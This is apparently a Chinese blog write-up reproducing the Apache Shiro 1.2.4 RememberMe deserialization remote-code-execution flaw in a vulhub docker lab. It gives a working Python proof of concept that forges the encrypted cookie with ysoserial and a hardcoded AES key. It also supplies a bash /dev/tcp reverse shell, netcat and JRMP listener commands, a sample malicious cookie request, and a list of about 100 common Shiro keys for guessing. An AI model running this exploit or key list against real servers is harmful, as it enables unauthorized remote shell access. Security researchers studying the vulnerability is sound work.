Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现
0x00 影响版本
Apache Shiro <= 1.2.4
0x01 产生原因
shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:
得到rememberMe的cookie值-->Base64解码-->AES解密-->反序列化
然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。
payload 构造
前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cookie
0x02 靶场环境
docker pull vulhub/shiro
然后打开127.0.0.1:8080
0x03 漏洞复现
POC:
import sys import uuid import base64 import subprocess from Crypto.Cipher import AES def encode_rememberme(command): popen = subprocess.Popen([‘java‘, ‘-jar‘, ‘ysoserial-0.0.6-SNAPSHOT-all.jar‘, ‘JRMPClient‘, command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") iv = uuid.uuid4().bytes encryptor = AES.new(key, AES.MODE_CBC, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext if __name__ == ‘__main__‘: payload = encode_rememberme(sys.argv[1]) print "rememberMe={0}".format(payload.decode())
攻击机上执行脚本生成恶意cookie
python shiro_shell.py 1.1.1.1:1099 #1.1.1.1为你的攻击机ip 端口可以随意变动,但是后面监听的时候也要做相应变动
生成的cookie类似下图
反弹shell制作
反弹shell需要加密,网址:http://www.jackson-t.ca/runtime-exec-payloads.html
反弹shell代码如下
bash -i >& /dev/tcp/1.1.1.1/7878 0>&1 #1.1.1.1为攻击机ip
攻击机监听端口
攻击机1.1.1.1上打开两个窗口,
其中一个窗口监听shell
nc -lvp 7878
另一个窗口监听JRMP端口
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 ‘加密后的反弹shell‘
将生成的恶意cookie通过httpie发送
在攻击机1.1.1.1上执行如下代码
http 1.1.1.2:8080/login ‘Cookie:rememberMe=UfsKYXK1SIOgFdnOxdPidh09yGZv6Medaj/T0E5sE9xhxMP69kzlNKsEdfHUhTgD12ea7NOv+xRhnZSGhUi9rz1tYVPu5QHfINrMS4I+lTe82RO5PY1vJrmMwP/NnBvjfGtTWTwRSNl1AhNgJrAhrEBStf+cpnBMwmoWxiexDjm2BavY/lSLe52hZhCEcr0zv/kqC9PdhBfY326+ux/RkE0pfwfZNMEUrPIZw8gBJkCIDTb1qj+W32+YinOKCkye/i+GmKHifPoMSt91q0nR/NQnxyu4UJQoULSbCI3/vXKtGm7P+YNqhH6smVPIoTxqtAqWTJG7eOafDPC2azUlhbLcmjql7qDL2wPpv4JOxB0fLIwdkQqSn9DCBty2BfKDqf8I/lvTbKqHHfVIUMdjYQ==‘
查看攻击机上监听的结果
发现两个端口都会收到消息
shell反弹到7878端口
常用的100个key
kPH+bIxk5D2deZiIxcaaaA== 4AvVhmFLUs0KTA3Kprsdag== Z3VucwAAAAAAAAAAAAAAAA== fCq+/xW488hMTCD+cmJ3aQ== 0AvVhmFLUs0KTA3Kprsdag== 1AvVhdsgUs0FSA3SDFAdag== 1QWLxg+NYmxraMoxAXu/Iw== 25BsmdYwjnfcWmnhAciDDg== 2AvVhdsgUs0FSA3SDFAdag== 3AvVhmFLUs0KTA3Kprsdag== 3JvYhmBLUs0ETA5Kprsdag== r0e3c16IdVkouZgk1TKVMg== 5aaC5qKm5oqA5pyvAAAAAA== 5AvVhmFLUs0KTA3Kprsdag== 6AvVhmFLUs0KTA3Kprsdag== 6NfXkC7YVCV5DASIrEm1Rg== 6ZmI6I2j5Y+R5aSn5ZOlAA== cmVtZW1iZXJNZQAAAAAAAA== 7AvVhmFLUs0KTA3Kprsdag== 8AvVhmFLUs0KTA3Kprsdag== 8BvVhmFLUs0KTA3Kprsdag== 9AvVhmFLUs0KTA3Kprsdag== OUHYQzxQ/W9e/UjiAGu6rg== a3dvbmcAAAAAAAAAAAAAAA== aU1pcmFjbGVpTWlyYWNsZQ== bWljcm9zAAAAAAAAAAAAAA== bWluZS1hc3NldC1rZXk6QQ== bXRvbnMAAAAAAAAAAAAAAA== ZUdsaGJuSmxibVI2ZHc9PQ== wGiHplamyXlVB11UXWol8g== U3ByaW5nQmxhZGUAAAAAAA== MTIzNDU2Nzg5MGFiY2RlZg== L7RioUULEFhRyxM7a2R/Yg== a2VlcE9uR29pbmdBbmRGaQ== WcfHGU25gNnTxTlmJMeSpw== OY//C4rhfwNxCQAQCrQQ1Q== 5J7bIJIV0LQSN3c9LPitBQ== f/SY5TIve5WWzT4aQlABJA== bya2HkYo57u6fWh5theAWw== WuB+y2gcHRnY2Lg9+Aqmqg== kPv59vyqzj00x11LXJZTjJ2UHW48jzHN 3qDVdLawoIr1xFd6ietnwg== ZWvohmPdUsAWT3=KpPqda YI1+nBV//m7ELrIyDHm6DQ== 6Zm+6I2j5Y+R5aS+5ZOlAA== 2A2V+RFLUs+eTA3Kpr+dag== 6ZmI6I2j3Y+R1aSn5BOlAA== SkZpbmFsQmxhZGUAAAAAAA== 2cVtiE83c4lIrELJwKGJUw== fsHspZw/92PrS3XrPW+vxw== XTx6CKLo/SdSgub+OPHSrw== sHdIjUN6tzhl8xZMG3ULCQ== O4pdf+7e+mZe8NyxMTPJmQ== HWrBltGvEZc14h9VpMvZWw== rPNqM6uKFCyaL10AK51UkQ== Y1JxNSPXVwMkyvES/kJGeQ== lT2UvDUmQwewm6mMoiw4Ig== MPdCMZ9urzEA50JDlDYYDg== xVmmoltfpb8tTceuT5R7Bw== c+3hFGPjbgzGdrC+MHgoRQ== ClLk69oNcA3m+s0jIMIkpg== Bf7MfkNR0axGGptozrebag== 1tC/xrDYs8ey+sa3emtiYw== ZmFsYWRvLnh5ei5zaGlybw== cGhyYWNrY3RmREUhfiMkZA== IduElDUpDDXE677ZkhhKnQ== yeAAo1E8BOeAYfBlm4NG9Q== cGljYXMAAAAAAAAAAAAAAA== 2itfW92XazYRi5ltW0M2yA== XgGkgqGqYrix9lI6vxcrRw== ertVhmFLUs0KTA3Kprsdag== 5AvVhmFLUS0ATA4Kprsdag== s0KTA3mFLUprK4AvVhsdag== hBlzKg78ajaZuTE0VLzDDg== 9FvVhtFLUs0KnA3Kprsdyg== d2ViUmVtZW1iZXJNZUtleQ== yNeUgSzL/CfiWw1GALg6Ag== NGk/3cQ6F5/UNPRh8LpMIg== 4BvVhmFLUs0KTA3Kprsdag== MzVeSkYyWTI2OFVLZjRzZg== CrownKey==a12d/dakdad empodDEyMwAAAAAAAAAAAA== A7UzJgh1+EWj5oBFi+mSgw== YTM0NZomIzI2OTsmIzM0NTueYQ== c2hpcm9fYmF0aXMzMgAAAA== i45FVt72K2kLgvFrJtoZRw== U3BAbW5nQmxhZGUAAAAAAA== ZnJlc2h6Y24xMjM0NTY3OA== Jt3C93kMR9D5e8QzwfsiMw== MTIzNDU2NzgxMjM0NTY3OA== vXP33AonIp9bFwGl7aT7rA== V2hhdCBUaGUgSGVsbAAAAA== Z3h6eWd4enklMjElMjElMjE= Q01TX0JGTFlLRVlfMjAxOQ== ZAvph3dsQs0FSL3SDFAdag== Is9zJ3pzNh2cgTHB4ua3+Q== NsZXjXVklWPZwOfkvk6kUA== GAevYnznvgNCURavBhCr1w== 66v1O8keKNV3TTcGPK1wzg== SDKOLKn2J1j/2BHjeZwAoQ==
相关推荐
xclxcl 2020-08-03
zmzmmf 2020-08-03
visionzheng 2020-05-05
chenjia00 2020-03-23
visionzheng 2020-06-07
杜鲁门 2020-11-05
luckyxl0 2020-08-16
Dullonjiang 2020-08-09
MicroBoy 2020-08-02
ganjing 2020-08-02
likesyour 2020-08-01
zmzmmf 2020-07-09
MicroBoy 2020-07-05
zzhao 2020-06-26
子云 2020-06-18
neweastsun 2020-06-04
ErixHao 2020-06-03
GDreams0 2020-06-01
ganjing 2020-05-29